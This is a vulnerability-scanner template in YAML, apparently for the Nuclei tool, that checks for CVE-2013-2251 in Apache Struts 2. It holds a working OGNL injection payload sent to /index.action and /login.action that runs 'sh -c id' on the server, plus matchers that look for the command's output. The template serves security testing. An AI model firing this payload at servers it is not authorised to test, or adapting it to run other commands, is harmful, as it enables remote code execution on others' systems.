47 lines
2.2 KiB
YAML
47 lines
2.2 KiB
YAML
id: cve-2013-2251
|
|
|
|
info:
|
|
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
|
|
author: exploitation & @dwisiswant0
|
|
severity: critical
|
|
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
|
|
|
requests:
|
|
- payloads:
|
|
params:
|
|
- "redirect"
|
|
- "action"
|
|
- "redirectAction"
|
|
raw:
|
|
- |
|
|
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Connection: close
|
|
Accept: */*
|
|
Accept-Language: en
|
|
|
|
- |
|
|
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Connection: close
|
|
Accept: */*
|
|
Accept-Language: en
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- 400
|
|
condition: or
|
|
- type: regex
|
|
regex:
|
|
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
|
- type: word
|
|
words:
|
|
- "There is no Action mapped for namespace"
|
|
- "The origin server did not find a current representation for the target resource"
|
|
- "Apache Tomcat"
|
|
condition: or
|
|
part: body
|